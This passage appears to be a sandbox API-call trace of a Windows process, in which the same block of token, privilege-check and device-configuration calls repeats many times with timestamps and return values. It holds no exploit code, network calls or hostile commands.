GetCurrentProcess () returned 0xffffffff [0084.665] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.665] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.665] SetLastError (dwErrCode=0x522) [0084.665] CloseHandle (hObject=0x114) returned 1 [0084.665] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.665] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.665] GetLastError () returned 0x578 [0084.665] SetLastError (dwErrCode=0x578) [0084.665] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.665] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.665] GetCurrentThread () returned 0xfffffffe [0084.665] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.665] GetLastError () returned 0x3f0 [0084.665] GetCurrentProcess () returned 0xffffffff [0084.665] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.665] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.666] SetLastError (dwErrCode=0x522) [0084.666] CloseHandle (hObject=0x114) returned 1 [0084.666] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.666] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.666] GetLastError () returned 0x578 [0084.666] SetLastError (dwErrCode=0x578) [0084.666] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.666] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.666] GetCurrentThread () returned 0xfffffffe [0084.666] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.666] GetLastError () returned 0x3f0 [0084.666] GetCurrentProcess () returned 0xffffffff [0084.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.666] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.666] SetLastError (dwErrCode=0x522) [0084.666] CloseHandle (hObject=0x114) returned 1 [0084.666] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.666] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.666] GetLastError () returned 0x578 [0084.666] SetLastError (dwErrCode=0x578) [0084.666] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.666] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.666] GetCurrentThread () returned 0xfffffffe [0084.666] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.666] GetLastError () returned 0x3f0 [0084.666] GetCurrentProcess () returned 0xffffffff [0084.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.666] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.666] SetLastError (dwErrCode=0x522) [0084.666] CloseHandle (hObject=0x114) returned 1 [0084.666] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.666] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.666] GetLastError () returned 0x578 [0084.666] SetLastError (dwErrCode=0x578) [0084.666] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.666] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.666] GetCurrentThread () returned 0xfffffffe [0084.666] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.666] GetLastError () returned 0x3f0 [0084.666] GetCurrentProcess () returned 0xffffffff [0084.666] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.667] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.667] SetLastError (dwErrCode=0x522) [0084.667] CloseHandle (hObject=0x114) returned 1 [0084.667] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.667] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.667] GetLastError () returned 0x578 [0084.667] SetLastError (dwErrCode=0x578) [0084.667] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.667] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.667] GetCurrentThread () returned 0xfffffffe [0084.667] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.667] GetLastError () returned 0x3f0 [0084.667] GetCurrentProcess () returned 0xffffffff [0084.667] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.667] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.667] SetLastError (dwErrCode=0x522) [0084.667] CloseHandle (hObject=0x114) returned 1 [0084.667] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.667] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.667] GetLastError () returned 0x578 [0084.667] SetLastError (dwErrCode=0x578) [0084.667] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.667] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.667] GetCurrentThread () returned 0xfffffffe [0084.667] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.667] GetLastError () returned 0x3f0 [0084.667] GetCurrentProcess () returned 0xffffffff [0084.667] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.667] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.667] SetLastError (dwErrCode=0x522) [0084.667] CloseHandle (hObject=0x114) returned 1 [0084.667] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.667] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.667] GetLastError () returned 0x578 [0084.667] SetLastError (dwErrCode=0x578) [0084.667] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.667] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.667] GetCurrentThread () returned 0xfffffffe [0084.667] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.668] GetLastError () returned 0x3f0 [0084.668] GetCurrentProcess () returned 0xffffffff [0084.668] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.668] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.668] SetLastError (dwErrCode=0x522) [0084.668] CloseHandle (hObject=0x114) returned 1 [0084.668] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.668] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.668] GetLastError () returned 0x578 [0084.668] SetLastError (dwErrCode=0x578) [0084.668] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.668] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.668] GetCurrentThread () returned 0xfffffffe [0084.668] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.668] GetLastError () returned 0x3f0 [0084.668] GetCurrentProcess () returned 0xffffffff [0084.668] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.668] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.668] SetLastError (dwErrCode=0x522) [0084.668] CloseHandle (hObject=0x114) returned 1 [0084.668] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.668] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.668] GetLastError () returned 0x578 [0084.668] SetLastError (dwErrCode=0x578) [0084.668] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.668] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.668] GetCurrentThread () returned 0xfffffffe [0084.668] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.668] GetLastError () returned 0x3f0 [0084.668] GetCurrentProcess () returned 0xffffffff [0084.668] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.668] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.668] SetLastError (dwErrCode=0x522) [0084.668] CloseHandle (hObject=0x114) returned 1 [0084.668] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.668] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.668] GetLastError () returned 0x578 [0084.668] SetLastError (dwErrCode=0x578) [0084.668] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.668] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.669] GetCurrentThread () returned 0xfffffffe [0084.669] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.669] GetLastError () returned 0x3f0 [0084.669] GetCurrentProcess () returned 0xffffffff [0084.669] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.669] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.669] SetLastError (dwErrCode=0x522) [0084.669] CloseHandle (hObject=0x114) returned 1 [0084.669] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.669] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.669] GetLastError () returned 0x578 [0084.669] SetLastError (dwErrCode=0x578) [0084.669] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.669] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.669] GetCurrentThread () returned 0xfffffffe [0084.669] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.669] GetLastError () returned 0x3f0 [0084.669] GetCurrentProcess () returned 0xffffffff [0084.669] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.669] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.669] SetLastError (dwErrCode=0x522) [0084.669] CloseHandle (hObject=0x114) returned 1 [0084.669] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.669] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.669] GetLastError () returned 0x578 [0084.669] SetLastError (dwErrCode=0x578) [0084.669] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.669] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.669] GetCurrentThread () returned 0xfffffffe [0084.669] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.669] GetLastError () returned 0x3f0 [0084.669] GetCurrentProcess () returned 0xffffffff [0084.669] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.669] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.669] SetLastError (dwErrCode=0x522) [0084.669] CloseHandle (hObject=0x114) returned 1 [0084.669] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.669] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.669] GetLastError () returned 0x578 [0084.669] SetLastError (dwErrCode=0x578) [0084.669] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.670] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.670] GetCurrentThread () returned 0xfffffffe [0084.670] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.670] GetLastError () returned 0x3f0 [0084.670] GetCurrentProcess () returned 0xffffffff [0084.670] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.670] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.670] SetLastError (dwErrCode=0x522) [0084.670] CloseHandle (hObject=0x114) returned 1 [0084.670] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.670] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.670] GetLastError () returned 0x578 [0084.670] SetLastError (dwErrCode=0x578) [0084.670] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.670] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.670] GetCurrentThread () returned 0xfffffffe [0084.670] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.670] GetLastError () returned 0x3f0 [0084.670] GetCurrentProcess () returned 0xffffffff [0084.670] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.670] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.670] SetLastError (dwErrCode=0x522) [0084.670] CloseHandle (hObject=0x114) returned 1 [0084.670] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.670] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.670] GetLastError () returned 0x578 [0084.670] SetLastError (dwErrCode=0x578) [0084.670] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.670] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.670] GetCurrentThread () returned 0xfffffffe [0084.670] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.670] GetLastError () returned 0x3f0 [0084.670] GetCurrentProcess () returned 0xffffffff [0084.670] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.670] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.670] SetLastError (dwErrCode=0x522) [0084.670] CloseHandle (hObject=0x114) returned 1 [0084.670] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.670] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.670] GetLastError () returned 0x578 [0084.671] SetLastError (dwErrCode=0x578) [0084.671] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.671] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.671] GetCurrentThread () returned 0xfffffffe [0084.671] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.671] GetLastError () returned 0x3f0 [0084.671] GetCurrentProcess () returned 0xffffffff [0084.671] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.671] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.671] SetLastError (dwErrCode=0x522) [0084.671] CloseHandle (hObject=0x114) returned 1 [0084.671] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.671] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.671] GetLastError () returned 0x578 [0084.671] SetLastError (dwErrCode=0x578) [0084.671] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.671] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.671] GetCurrentThread () returned 0xfffffffe [0084.671] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.671] GetLastError () returned 0x3f0 [0084.671] GetCurrentProcess () returned 0xffffffff [0084.671] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.671] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.671] SetLastError (dwErrCode=0x522) [0084.671] CloseHandle (hObject=0x114) returned 1 [0084.671] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.671] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.671] GetLastError () returned 0x578 [0084.671] SetLastError (dwErrCode=0x578) [0084.671] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.671] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.671] GetCurrentThread () returned 0xfffffffe [0084.671] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.672] GetLastError () returned 0x3f0 [0084.672] GetCurrentProcess () returned 0xffffffff [0084.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.672] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.672] SetLastError (dwErrCode=0x522) [0084.672] CloseHandle (hObject=0x114) returned 1 [0084.672] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.672] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.672] GetLastError () returned 0x578 [0084.672] SetLastError (dwErrCode=0x578) [0084.672] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.672] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.672] GetCurrentThread () returned 0xfffffffe [0084.672] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.672] GetLastError () returned 0x3f0 [0084.672] GetCurrentProcess () returned 0xffffffff [0084.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.672] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.672] SetLastError (dwErrCode=0x522) [0084.672] CloseHandle (hObject=0x114) returned 1 [0084.672] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.672] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.672] GetLastError () returned 0x578 [0084.672] SetLastError (dwErrCode=0x578) [0084.672] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.672] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.672] GetCurrentThread () returned 0xfffffffe [0084.672] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.672] GetLastError () returned 0x3f0 [0084.672] GetCurrentProcess () returned 0xffffffff [0084.672] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.672] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.672] SetLastError (dwErrCode=0x522) [0084.672] CloseHandle (hObject=0x114) returned 1 [0084.673] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.673] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.673] GetLastError () returned 0x578 [0084.673] SetLastError (dwErrCode=0x578) [0084.673] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.673] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.673] GetCurrentThread () returned 0xfffffffe [0084.673] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.673] GetLastError () returned 0x3f0 [0084.673] GetCurrentProcess () returned 0xffffffff [0084.673] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.673] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: 